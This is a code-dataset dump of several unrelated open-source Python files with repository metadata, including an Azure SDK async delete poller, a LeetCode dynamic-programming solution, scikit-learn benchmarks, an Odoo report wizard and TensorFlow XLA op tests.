api_version: Literal["2022-04-30-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2022-04-30-preview")
)
cls: ClsType[_models.PrivateEndpointConnection] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_delete.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/iotHubs/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
| [
"noreply@github.com"
] | kurtzeborn.noreply@github.com |
6b40833fba82cb85808e5f9f3fbb03fa0177cdfa | 03d07de94fc22d1583c45ca84c711a06df8a40ff | /lc/dynamic_programming/lc_474_ones-and-zeroes.py | 92e6f2fda2baa84c8f8040ccba0e83ef0384d9a7 | [] | no_license | gaopenghigh/algorithm | 94e04293c69a2ad6903495e1cf6e1b75556535bb | f5d78c98c7201c56f9d4c3a9c0c76e9447a17985 | refs/heads/master | 2022-03-11T18:46:38.712923 | 2022-02-20T14:20:54 | 2022-02-20T14:20:54 | 54,484,549 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,416 | py | # 474. 一和零
# 给你一个二进制字符串数组 strs 和两个整数 m 和 n 。
# 请你找出并返回 strs 的最大子集的长度,该子集中 最多 有 m 个 0 和 n 个 1 。
# 如果 x 的所有元素也是 y 的元素,集合 x 是集合 y 的 子集 。
#
# 示例 1:
# 输入:strs = ["10", "0001", "111001", "1", "0"], m = 5, n = 3
# 输出:4
# 解释:最多有 5 个 0 和 3 个 1 的最大子集是 {"10","0001","1","0"} ,因此答案是 4 。
# 其他满足题意但较小的子集包括 {"0001","1"} 和 {"10","1","0"} 。{"111001"} 不满足题意,因为它含 4 个 1 ,大于 n 的值 3 。
#
# 示例 2:
# 输入:strs = ["10", "0", "1"], m = 1, n = 1
# 输出:2
# 解释:最大的子集是 {"0", "1"} ,所以答案是 2 。
#
# 提示:
# 1 <= strs.length <= 600
# 1 <= strs[i].length <= 100
# strs[i] 仅由 '0' 和 '1' 组成
# 1 <= m, n <= 100
# dp[i][j][k] 中 i, j 和 k 描述状态,从前 i 个元素中选择满足要求的最大子集,其中最多有 j 个 0 和 k 个 1
# i 的最大值为 len(strs), j 和 k 的最大值为 m 和 n
# base case: dp[0][x][x] = 0
# 假设 strs[i] 有 x 个 '0' 和 y 个 '1'
# 如果最终的最大子集中包含了 strs[i],则 dp[i][j][k] = 1 + dp[i-1][j-x][k-y]
# 如果最大子集中不包含 strs[i],则 dp[i][j][k] = dp[i-1][j][k]
# 取其中的最大值作为 dp[i][j][k] 的值
# 最终的答案就是 dp[len(strs)][m][n]
class Solution:
def findMaxForm(self, strs: list[str], m: int, n: int) -> int:
dp = [
[
[ 0 for _ in range(n + 1) ] for _ in range(m + 1)
] for _ in range(len(strs) + 1)
]
for i in range(1, len(strs)+1):
s = strs[i-1]
n0 = len([i for i in s if i == '0'])
n1 = len(s) - n0
for j in range(m+1):
for k in range(n+1):
if j >= n0 and k >= n1:
dp[i][j][k] = max(
1 + dp[i-1][j-n0][k-n1], # 选择
dp[i-1][j][k] # 不选择
)
else: # 只能不选择
dp[i][j][k] = dp[i-1][j][k] # 不选择
return dp[len(strs)][m][n]
if __name__ == '__main__':
strs = ["10", "0001", "111001", "1", "0"]
m = 5
n = 3
print(Solution().findMaxForm(strs, m, n)) | [
"jh.gao@ucloud.cn"
] | jh.gao@ucloud.cn |
9b596c719b030f28eac270a22b939f7f9af7eb1b | 5e9de302964b59ccd74aa3d62d4786c87ca60108 | /testmachine/common.py | cc5324bbe50a67ea2ea0b142239a1e4783349923 | [
"BSD-2-Clause"
] | permissive | cid-aaron/testmachine | 6c409d356ae3a3dc45d0ab35c8954d92cb57b4bf | dc207986b0d2d74241842472c80e98dd9f536e7d | refs/heads/master | 2020-05-20T16:52:40.615042 | 2014-01-11T12:26:14 | 2014-01-11T12:26:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,383 | py | import operator
from .operations import (
Drop,
Swap,
Rot,
BinaryOperator,
UnaryOperator,
ReadAndWrite,
Check,
PushRandom,
)
def operation(*args, **kwargs):
"""
Add an operation which pops arguments from each of the varstacks named
in args, passes the result in that order to function and pushes the
result of the invocation onto target. If target is None the result is
ignored.
"""
return ReadAndWrite(
*args, **kwargs
)
def binary_operation(*args, **kwargs):
return BinaryOperator(*args, **kwargs)
def unary_operation(operation, varstack, name):
return UnaryOperator(operation, varstack, name)
def check(*args, **kwargs):
"""
Add an operation which reads from the varstacks in args in order,
without popping their result and passes them in order to test. If test
returns something truthy this operation passes, else it will fail.
"""
return Check(*args, **kwargs)
def generate(*args, **kwargs):
"""
Add a generator for operations which produces values by calling
produce with a Random instance and pushes them onto target.
"""
return PushRandom(*args, **kwargs)
def basic_operations(varstack):
"""
Define basic stack shuffling and manipulation operations on varstack.
Most testmachines will want these on most varstacks. They don't do
anything very interesting, but by moving data around they expand the
range of programs that can be generated.
"""
return (
Drop(varstack),
Swap(varstack),
Rot(varstack),
)
def arithmetic_operations(varstack):
"""
Elements of varstack may be combined with the integer operations +, -,
* and /. They may also be negated.
"""
return (
binary_operation(operator.add, varstack, "+"),
binary_operation(operator.sub, varstack, "-"),
binary_operation(operator.mul, varstack, "*"),
unary_operation(operator.neg, varstack, "-"),
)
def ints(target="ints"):
"""
Convenience function to define operations for filling target with ints.
Defines some generators, and adds basic and arithmetic operations to target
"""
return (
basic_operations(target),
arithmetic_operations(target),
generate(lambda r: r.randint(0, 10 ** 6), target),
generate(lambda r: r.randint(-10, 10), target),
)
def lists(source, target):
"""
Operations which populate target with lists whose elements come from source
"""
return (
basic_operations(target),
generate(lambda r: [], target),
operation(
function=lambda x, y: x.append(y),
argspec=(target, source),
target=None,
name="append",
pattern="{0}.append({1})"
),
operation(
function=lambda x: [x],
argspec=(source,),
target=target,
name="singleton",
pattern="[{0}]",
),
operation(
function=lambda x, y: [x, y],
argspec=(source, source),
target=target,
name="pair",
pattern="[{0}, {1}]",
),
operation(
function=list,
argspec=(target,),
target=target
),
binary_operation(operator.add, target, "+"),
)
| [
"david@drmaciver.com"
] | david@drmaciver.com |
77cbdfeadabbc31c5a1c4debe0f00849f53dbac8 | ae71e532468e861e3a9fcb90f613eddca267ace6 | /routes/class_incoming.py | f2d93f0a50f1963382d3895bbaf47dcf3e2de6e0 | [
"CC-BY-4.0"
] | permissive | soon14/proms-4.0 | 0b4ed398125e529c13dc8f0d9b0c14e0348ae5c6 | 6c3a1fd62c9394761664e100fc1dde50fd79dc11 | refs/heads/master | 2020-09-23T20:33:56.716317 | 2019-06-09T04:01:29 | 2019-06-09T04:01:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,124 | py | from abc import ABCMeta, abstractmethod
import database
from . import w_l
class IncomingClass(metaclass=ABCMeta):
@abstractmethod
def __init__(self, request):
self.request = request
self.graph = None
self.uri = None
self.named_graph_uri = None
self.error_messages = None
@abstractmethod
def valid(self):
pass
@abstractmethod
def determine_uri(self):
pass
def stored(self):
""" Add an item to PROMS"""
if self.graph is None or self.named_graph_uri is None:
msg = 'The graph and the named_grapoh_uri properties of this class instance must not be None when trying ' \
'to store this instance in the provenance DB.'
self.error_messages = msg
return False
try:
w_l(str(self.graph))
w_l(str(self.named_graph_uri))
database.insert(self.graph, self.named_graph_uri)
return True
except Exception as e:
self.error_messages = ['Could not connect to the provenance database']
return False
| [
"m13001282105@163.com"
] | m13001282105@163.com |
1b720e6c3d0b7ff11d6d728118fb3c6214ec45a5 | 75cf6a9fd035883b64ca2309382e0178cf370b43 | /Empirical/python/sklearn/zdivers/benchmarks/bench_multilabel_metrics.py | 02a1fb8b5d83267d249892377574c05608ec6fba | [] | no_license | ygtfrdes/Program | 171b95b9f32a105185a7bf8ec6c8c1ca9d1eda9d | 1c1e30230f0df50733b160ca73510c41d777edb9 | refs/heads/master | 2022-10-08T13:13:17.861152 | 2019-11-06T04:53:27 | 2019-11-06T04:53:27 | 219,560,170 | 1 | 2 | null | 2022-09-30T19:51:17 | 2019-11-04T17:39:52 | HTML | UTF-8 | Python | false | false | 7,086 | py | #!/usr/bin/python
#!/usr/bin/env python
"""
A comparison of multilabel target formats and metrics over them
"""
from timeit import timeit
from functools import partial
import itertools
import argparse
import sys
import matplotlib.pyplot as plt
import scipy.sparse as sp
import numpy as np
from sklearn.datasets import make_multilabel_classification
from sklearn.metrics import (f1_score, accuracy_score, hamming_loss,
jaccard_similarity_score)
from sklearn.utils.testing import ignore_warnings
METRICS = {
'f1': partial(f1_score, average='micro'),
'f1-by-sample': partial(f1_score, average='samples'),
'accuracy': accuracy_score,
'hamming': hamming_loss,
'jaccard': jaccard_similarity_score,
}
FORMATS = {
'sequences': lambda y: [list(np.flatnonzero(s)) for s in y],
'dense': lambda y: y,
'csr': lambda y: sp.csr_matrix(y),
'csc': lambda y: sp.csc_matrix(y),
}
@ignore_warnings
def benchmark(metrics=tuple(v for k, v in sorted(METRICS.items())),
formats=tuple(v for k, v in sorted(FORMATS.items())),
samples=1000, classes=4, density=.2,
n_times=5):
"""Times metric calculations for a number of inputs
Parameters
----------
metrics : array-like of callables (1d or 0d)
The metric functions to time.
formats : array-like of callables (1d or 0d)
These may transform a dense indicator matrix into multilabel
representation.
samples : array-like of ints (1d or 0d)
The number of samples to generate as input.
classes : array-like of ints (1d or 0d)
The number of classes in the input.
density : array-like of ints (1d or 0d)
The density of positive labels in the input.
n_times : int
Time calling the metric n_times times.
Returns
-------
array of floats shaped like (metrics, formats, samples, classes, density)
Time in seconds.
"""
metrics = np.atleast_1d(metrics)
samples = np.atleast_1d(samples)
classes = np.atleast_1d(classes)
density = np.atleast_1d(density)
formats = np.atleast_1d(formats)
out = np.zeros((len(metrics), len(formats), len(samples), len(classes),
len(density)), dtype=float)
it = itertools.product(samples, classes, density)
for i, (s, c, d) in enumerate(it):
_, y_true = make_multilabel_classification(n_samples=s, n_features=1,
n_classes=c, n_labels=d * c,
random_state=42)
_, y_pred = make_multilabel_classification(n_samples=s, n_features=1,
n_classes=c, n_labels=d * c,
random_state=84)
for j, f in enumerate(formats):
f_true = f(y_true)
f_pred = f(y_pred)
for k, metric in enumerate(metrics):
t = timeit(partial(metric, f_true, f_pred), number=n_times)
out[k, j].flat[i] = t
return out
def _tabulate(results, metrics, formats):
"""Prints results by metric and format
Uses the last ([-1]) value of other fields
"""
column_width = max(max(len(k) for k in formats) + 1, 8)
first_width = max(len(k) for k in metrics)
head_fmt = ('{:<{fw}s}' + '{:>{cw}s}' * len(formats))
row_fmt = ('{:<{fw}s}' + '{:>{cw}.3f}' * len(formats))
print(head_fmt.format('Metric', *formats,
cw=column_width, fw=first_width))
for metric, row in zip(metrics, results[:, :, -1, -1, -1]):
print(row_fmt.format(metric, *row,
cw=column_width, fw=first_width))
def _plot(results, metrics, formats, title, x_ticks, x_label,
format_markers=('x', '|', 'o', '+'),
metric_colors=('c', 'm', 'y', 'k', 'g', 'r', 'b')):
"""
Plot the results by metric, format and some other variable given by
x_label
"""
fig = plt.figure('scikit-learn multilabel metrics benchmarks')
plt.title(title)
ax = fig.add_subplot(111)
for i, metric in enumerate(metrics):
for j, format in enumerate(formats):
ax.plot(x_ticks, results[i, j].flat,
label='{}, {}'.format(metric, format),
marker=format_markers[j],
color=metric_colors[i % len(metric_colors)])
ax.set_xlabel(x_label)
ax.set_ylabel('Time (s)')
ax.legend()
plt.show()
if __name__ == "__main__":
ap = argparse.ArgumentParser()
ap.add_argument('metrics', nargs='*', default=sorted(METRICS),
help='Specifies metrics to benchmark, defaults to all. '
'Choices are: {}'.format(sorted(METRICS)))
ap.add_argument('--formats', nargs='+', choices=sorted(FORMATS),
help='Specifies multilabel formats to benchmark '
'(defaults to all).')
ap.add_argument('--samples', type=int, default=1000,
help='The number of samples to generate')
ap.add_argument('--classes', type=int, default=10,
help='The number of classes')
ap.add_argument('--density', type=float, default=.2,
help='The average density of labels per sample')
ap.add_argument('--plot', choices=['classes', 'density', 'samples'],
default=None,
help='Plot time with respect to this parameter varying '
'up to the specified value')
ap.add_argument('--n-steps', default=10, type=int,
help='Plot this many points for each metric')
ap.add_argument('--n-times',
default=5, type=int,
help="Time performance over n_times trials")
args = ap.parse_args()
if args.plot is not None:
max_val = getattr(args, args.plot)
if args.plot in ('classes', 'samples'):
min_val = 2
else:
min_val = 0
steps = np.linspace(min_val, max_val, num=args.n_steps + 1)[1:]
if args.plot in ('classes', 'samples'):
steps = np.unique(np.round(steps).astype(int))
setattr(args, args.plot, steps)
if args.metrics is None:
args.metrics = sorted(METRICS)
if args.formats is None:
args.formats = sorted(FORMATS)
results = benchmark([METRICS[k] for k in args.metrics],
[FORMATS[k] for k in args.formats],
args.samples, args.classes, args.density,
args.n_times)
_tabulate(results, args.metrics, args.formats)
if args.plot is not None:
print('Displaying plot', file=sys.stderr)
title = ('Multilabel metrics with %s' %
', '.join('{0}={1}'.format(field, getattr(args, field))
for field in ['samples', 'classes', 'density']
if args.plot != field))
_plot(results, args.metrics, args.formats, title, steps, args.plot)
| [
"githubfortyuds@gmail.com"
] | githubfortyuds@gmail.com |
9108e76bcc9deddc6f24d53e3de93b4c57e58f2e | 3005ac0fbafc802212f788185138206f13b1103d | /PILtest/tests2018_4_7.py | d5ec97cc486ac983271e930705ee8380a446d523 | [] | no_license | Tony1886/python_workplace | a8903127d33d95c8e02e09dc2b4c4528a26561ad | 6d1b325ee060dda46e81e359b7ed1402d3f02bdf | refs/heads/master | 2020-05-24T15:09:50.366564 | 2019-05-18T06:51:03 | 2019-05-18T06:51:03 | 187,324,243 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,689 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Apr 7 17:38:41 2018
@author: Tan Zhijie
"""
import numpy as np
import myFunction as mf
import tensorflow as tf
import matplotlib.pyplot as plt
# 生成几个随机二值图进行傅里叶变换
M = 1
N = 64
m = 2000
n = M*N
Es = np.zeros((m,M,N))
Ir = np.zeros(np.shape(Es))
for i in range(m):
Es[i] = np.random.randint(0,2,[M,N])
Er = mf.mfft(Es[i])
Ir[i] = abs(Er)**2
Y = np.reshape(Es,[m,n])
X = np.reshape(Ir,[m,n])
X = X/np.max(X)
def compute_accuracy(v_xs,v_ys):
global prediction
y_pre = sess.run(prediction,feed_dict={xs:v_xs})
correct_prediction = tf.equal(tf.argmax(y_pre,1), tf.argmax(v_ys,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float"))
result = sess.run(accuracy,feed_dict={xs:v_xs,ys:v_ys})
return result
# 构造神经网络的一层
def add_layer(inputs,in_size,out_size,activation = None):
W = tf.Variable(tf.random_normal([in_size,out_size])/in_size,name = 'W')
# W = tf.Variable(tf.zeros([in_size,out_size]),name = 'W')
b = tf.Variable(tf.zeros([1,out_size]),name = 'b')
Z = tf.matmul(inputs,W)+b
if activation ==None:
output = Z
else:
output = activation(Z)
return output
# define input
xs = tf.placeholder(tf.float32,[None,n])
ys = tf.placeholder(tf.float32,[None,n])
keep_drop = tf.placeholder(tf.float32)
# add layer
layer = [n,10*n,10*n,n]
for i in range(len(layer)-1):
if i == 0:
l = add_layer(xs,layer[i],layer[i+1],activation=tf.nn.relu)
elif i==len(layer)-2:
prediction = add_layer(l,layer[i],layer[i+1], activation=tf.sigmoid)
else:
l = add_layer(l,layer[i],layer[i+1],activation=tf.nn.relu)
# loss function 交叉熵
#loss = tf.reduce_mean(tf.reduce_sum(-ys*tf.log(prediction),
# reduction_indices = [1]))
# loss function mse
loss = tf.reduce_mean(tf.reduce_sum(tf.square(ys-prediction),
reduction_indices = [1]))
train = tf.train.GradientDescentOptimizer(0.1).minimize(loss)
sess = tf.Session()
sess.run(tf.global_variables_initializer())
for i in range(500):
sess.run(train,feed_dict = {xs:X,ys:Y,keep_drop:0.5})
if i%50 == 0:
print(compute_accuracy(X, Y))
# 比较任意一幅图结果
test = 0
result = sess.run(prediction,feed_dict={xs:X[test].reshape([1,n])})
plt.figure
#plt.subplot(121)
#plt.imshow(result.reshape([8,8]))
plt.scatter(np.linspace(1,64,64),result)
#plt.subplot(122)
#plt.imshow(Es[test])
plt.scatter(np.linspace(1,64,64),Y[test],c = 'r')
plt.show() | [
"="
] | = |
f47ce709574d8f6f0b2c6c34e551d32cd278a480 | 4c3e992678341ccaa1d4d14e97dac2e0682026d1 | /addons/account/wizard/account_report_common.py | da1be81acd79cea6ed6fb59206f46c531281111e | [] | no_license | gahan-corporation/wyatt | 3a6add8f8f815bd26643e1e7c81aea024945130d | 77e56da362bec56f13bf0abc9f8cf13e98461111 | refs/heads/master | 2021-09-03T18:56:15.726392 | 2018-01-08T02:54:47 | 2018-01-08T02:54:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,850 | py | # -*- coding: utf-8 -*-
from gerp import api, fields, models, _
class AccountCommonReport(models.TransientModel):
_name = "account.common.report"
_description = "Account Common Report"
company_id = fields.Many2one('res.company', string='Company', readonly=True, default=lambda self: self.env.user.company_id)
journal_ids = fields.Many2many('account.journal', string='Journals', required=True, default=lambda self: self.env['account.journal'].search([]))
date_from = fields.Date(string='Start Date')
date_to = fields.Date(string='End Date')
target_move = fields.Selection([('posted', 'All Posted Entries'),
('all', 'All Entries'),
], string='Target Moves', required=True, default='posted')
def _build_contexts(self, data):
result = {}
result['journal_ids'] = 'journal_ids' in data['form'] and data['form']['journal_ids'] or False
result['state'] = 'target_move' in data['form'] and data['form']['target_move'] or ''
result['date_from'] = data['form']['date_from'] or False
result['date_to'] = data['form']['date_to'] or False
result['strict_range'] = True if result['date_from'] else False
return result
def _print_report(self, data):
raise NotImplementedError()
@api.multi
def check_report(self):
self.ensure_one()
data = {}
data['ids'] = self.env.context.get('active_ids', [])
data['model'] = self.env.context.get('active_model', 'ir.ui.menu')
data['form'] = self.read(['date_from', 'date_to', 'journal_ids', 'target_move'])[0]
used_context = self._build_contexts(data)
data['form']['used_context'] = dict(used_context, lang=self.env.context.get('lang') or 'en_US')
return self._print_report(data)
| [
"duchess@gahan-corporation.com"
] | duchess@gahan-corporation.com |
7102f2c70c62f905e9f89bfc6d22e4b136f0f913 | 41f52b15ab4c256ed5579f65520d1dee949613b8 | /tensorflow/compiler/tests/nary_ops_test.py | d16e38bb3cb0fa30b556c42e951fc6ce7363c8f3 | [
"Apache-2.0"
] | permissive | ychen404/TensorFlowPlus | c029ad2a77850cc6f141c13a4c10925e0a92d771 | d4fcbe7278b983b6f736acf2d948e1f7954ca7e6 | refs/heads/master | 2022-10-15T16:59:37.683864 | 2017-10-04T23:28:02 | 2017-10-04T23:28:02 | 210,258,338 | 1 | 0 | Apache-2.0 | 2022-10-04T23:54:20 | 2019-09-23T03:37:58 | C++ | UTF-8 | Python | false | false | 11,970 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test cases for operators with > 3 or arbitrary numbers of arguments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.compiler.tests.xla_test import XLATestCase
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import googletest
class NAryOpsTest(XLATestCase):
def _testNAry(self, op, args, expected, equality_fn=None):
with self.test_session() as session:
with self.test_scope():
placeholders = [
array_ops.placeholder(dtypes.as_dtype(arg.dtype), arg.shape)
for arg in args
]
feeds = {placeholders[i]: args[i] for i in range(0, len(args))}
output = op(placeholders)
result = session.run(output, feeds)
if not equality_fn:
equality_fn = self.assertAllClose
equality_fn(result, expected, rtol=1e-3)
def _nAryListCheck(self, results, expected, **kwargs):
self.assertEqual(len(results), len(expected))
for (r, e) in zip(results, expected):
self.assertAllClose(r, e, **kwargs)
def _testNAryLists(self, op, args, expected):
self._testNAry(op, args, expected, equality_fn=self._nAryListCheck)
def testFloat(self):
self._testNAry(math_ops.add_n,
[np.array([[1, 2, 3]], dtype=np.float32)],
expected=np.array([[1, 2, 3]], dtype=np.float32))
self._testNAry(math_ops.add_n,
[np.array([1, 2], dtype=np.float32),
np.array([10, 20], dtype=np.float32)],
expected=np.array([11, 22], dtype=np.float32))
self._testNAry(math_ops.add_n,
[np.array([-4], dtype=np.float32),
np.array([10], dtype=np.float32),
np.array([42], dtype=np.float32)],
expected=np.array([48], dtype=np.float32))
def testIdentityN(self):
self._testNAryLists(array_ops.identity_n,
[np.array([[1, 2, 3]], dtype=np.float32)],
expected=[np.array([[1, 2, 3]], dtype=np.float32)])
self._testNAryLists(array_ops.identity_n,
[np.array([[1, 2], [3, 4]], dtype=np.float32),
np.array([[3, 2, 1], [6, 5, 1]], dtype=np.float32)],
expected=[
np.array([[1, 2], [3, 4]], dtype=np.float32),
np.array([[3, 2, 1], [6, 5, 1]], dtype=np.float32)])
self._testNAryLists(array_ops.identity_n,
[np.array([[1], [2], [3], [4]], dtype=np.int32),
np.array([[3, 2, 1], [6, 5, 1]], dtype=np.float32)],
expected=[
np.array([[1], [2], [3], [4]], dtype=np.int32),
np.array([[3, 2, 1], [6, 5, 1]], dtype=np.float32)])
def testConcat(self):
self._testNAry(
lambda x: array_ops.concat(x, 0), [
np.array(
[[1, 2, 3], [4, 5, 6]], dtype=np.float32), np.array(
[[7, 8, 9], [10, 11, 12]], dtype=np.float32)
],
expected=np.array(
[[1, 2, 3], [4, 5, 6], [7, 8, 9], [10, 11, 12]], dtype=np.float32))
self._testNAry(
lambda x: array_ops.concat(x, 1), [
np.array(
[[1, 2, 3], [4, 5, 6]], dtype=np.float32), np.array(
[[7, 8, 9], [10, 11, 12]], dtype=np.float32)
],
expected=np.array(
[[1, 2, 3, 7, 8, 9], [4, 5, 6, 10, 11, 12]], dtype=np.float32))
def testOneHot(self):
with self.test_session() as session, self.test_scope():
indices = array_ops.constant(np.array([[2, 3], [0, 1]], dtype=np.int32))
op = array_ops.one_hot(indices,
np.int32(4),
on_value=np.float32(7), off_value=np.float32(3))
output = session.run(op)
expected = np.array([[[3, 3, 7, 3], [3, 3, 3, 7]],
[[7, 3, 3, 3], [3, 7, 3, 3]]],
dtype=np.float32)
self.assertAllEqual(output, expected)
op = array_ops.one_hot(indices,
np.int32(4),
on_value=np.int32(2), off_value=np.int32(1),
axis=1)
output = session.run(op)
expected = np.array([[[1, 1], [1, 1], [2, 1], [1, 2]],
[[2, 1], [1, 2], [1, 1], [1, 1]]],
dtype=np.int32)
self.assertAllEqual(output, expected)
def testSplitV(self):
with self.test_session() as session:
with self.test_scope():
output = session.run(
array_ops.split(np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 0, 1, 2]],
dtype=np.float32),
[2, 2], 1))
expected = [np.array([[1, 2], [5, 6], [9, 0]], dtype=np.float32),
np.array([[3, 4], [7, 8], [1, 2]], dtype=np.float32)]
self.assertAllEqual(output, expected)
def testStridedSlice(self):
self._testNAry(lambda x: array_ops.strided_slice(*x),
[np.array([[], [], []], dtype=np.float32),
np.array([1, 0], dtype=np.int32),
np.array([3, 0], dtype=np.int32),
np.array([1, 1], dtype=np.int32)],
expected=np.array([[], []], dtype=np.float32))
if np.int64 in self.int_types:
self._testNAry(
lambda x: array_ops.strided_slice(*x), [
np.array([[], [], []], dtype=np.float32), np.array(
[1, 0], dtype=np.int64), np.array([3, 0], dtype=np.int64),
np.array([1, 1], dtype=np.int64)
],
expected=np.array([[], []], dtype=np.float32))
self._testNAry(lambda x: array_ops.strided_slice(*x),
[np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=np.float32),
np.array([1, 1], dtype=np.int32),
np.array([3, 3], dtype=np.int32),
np.array([1, 1], dtype=np.int32)],
expected=np.array([[5, 6], [8, 9]], dtype=np.float32))
self._testNAry(lambda x: array_ops.strided_slice(*x),
[np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=np.float32),
np.array([0, 2], dtype=np.int32),
np.array([2, 0], dtype=np.int32),
np.array([1, -1], dtype=np.int32)],
expected=np.array([[3, 2], [6, 5]], dtype=np.float32))
self._testNAry(lambda x: x[0][0:2, array_ops.newaxis, ::-1],
[np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=np.float32)],
expected=np.array([[[3, 2, 1]], [[6, 5, 4]]],
dtype=np.float32))
self._testNAry(lambda x: x[0][1, :, array_ops.newaxis],
[np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=np.float32)],
expected=np.array([[4], [5], [6]], dtype=np.float32))
def testStridedSliceGrad(self):
# Tests cases where input shape is empty.
self._testNAry(lambda x: array_ops.strided_slice_grad(*x),
[np.array([], dtype=np.int32),
np.array([], dtype=np.int32),
np.array([], dtype=np.int32),
np.array([], dtype=np.int32),
np.float32(0.5)],
expected=np.array(np.float32(0.5), dtype=np.float32))
# Tests case where input shape is non-empty, but gradients are empty.
self._testNAry(lambda x: array_ops.strided_slice_grad(*x),
[np.array([3], dtype=np.int32),
np.array([0], dtype=np.int32),
np.array([0], dtype=np.int32),
np.array([1], dtype=np.int32),
np.array([], dtype=np.float32)],
expected=np.array([0, 0, 0], dtype=np.float32))
self._testNAry(lambda x: array_ops.strided_slice_grad(*x),
[np.array([3, 0], dtype=np.int32),
np.array([1, 0], dtype=np.int32),
np.array([3, 0], dtype=np.int32),
np.array([1, 1], dtype=np.int32),
np.array([[], []], dtype=np.float32)],
expected=np.array([[], [], []], dtype=np.float32))
self._testNAry(lambda x: array_ops.strided_slice_grad(*x),
[np.array([3, 3], dtype=np.int32),
np.array([1, 1], dtype=np.int32),
np.array([3, 3], dtype=np.int32),
np.array([1, 1], dtype=np.int32),
np.array([[5, 6], [8, 9]], dtype=np.float32)],
expected=np.array([[0, 0, 0], [0, 5, 6], [0, 8, 9]],
dtype=np.float32))
def ssg_test(x):
return array_ops.strided_slice_grad(*x, shrink_axis_mask=0x4,
new_axis_mask=0x1)
self._testNAry(ssg_test,
[np.array([3, 1, 3], dtype=np.int32),
np.array([0, 0, 0, 2], dtype=np.int32),
np.array([0, 3, 1, -4], dtype=np.int32),
np.array([1, 2, 1, -3], dtype=np.int32),
np.array([[[1], [2]]], dtype=np.float32)],
expected=np.array([[[0, 0, 1]], [[0, 0, 0]], [[0, 0, 2]]],
dtype=np.float32))
ssg_test2 = lambda x: array_ops.strided_slice_grad(*x, new_axis_mask=0x15)
self._testNAry(ssg_test2,
[np.array([4, 4], dtype=np.int32),
np.array([0, 0, 0, 1, 0], dtype=np.int32),
np.array([0, 3, 0, 4, 0], dtype=np.int32),
np.array([1, 2, 1, 2, 1], dtype=np.int32),
np.array([[[[[1], [2]]], [[[3], [4]]]]], dtype=np.float32)],
expected=np.array([[0, 1, 0, 2], [0, 0, 0, 0], [0, 3, 0, 4],
[0, 0, 0, 0]], dtype=np.float32))
self._testNAry(lambda x: array_ops.strided_slice_grad(*x),
[np.array([3, 3], dtype=np.int32),
np.array([0, 2], dtype=np.int32),
np.array([2, 0], dtype=np.int32),
np.array([1, -1], dtype=np.int32),
np.array([[1, 2], [3, 4]], dtype=np.float32)],
expected=np.array([[0, 2, 1], [0, 4, 3], [0, 0, 0]],
dtype=np.float32))
self._testNAry(lambda x: array_ops.strided_slice_grad(*x),
[np.array([3, 3], dtype=np.int32),
np.array([2, 2], dtype=np.int32),
np.array([0, 1], dtype=np.int32),
np.array([-1, -2], dtype=np.int32),
np.array([[1], [2]], dtype=np.float32)],
expected=np.array([[0, 0, 0], [0, 0, 2], [0, 0, 1]],
dtype=np.float32))
if __name__ == "__main__":
googletest.main()
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
fcc225958a570be16bc7a19b38cb01a20de850da | 457959604ab1571c23d3c136ceb4def5dec685d5 | /tf_agents/agents/categorical_dqn/categorical_dqn_agent_test.py | 2380f5ac930402b7e81a3dc12cf34321bddb0106 | [
"Apache-2.0"
] | permissive | Squadrick/agents | de3aa6566cf237e82fdaf1569586365d7803302e | d7905cfc8b317900657113c34f51244ec5211b69 | refs/heads/master | 2020-06-07T07:47:05.797364 | 2019-06-19T20:53:58 | 2019-06-19T20:54:32 | 192,964,888 | 0 | 0 | Apache-2.0 | 2019-06-20T17:55:38 | 2019-06-20T17:55:38 | null | UTF-8 | Python | false | false | 15,208 | py | # coding=utf-8
# Copyright 2018 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
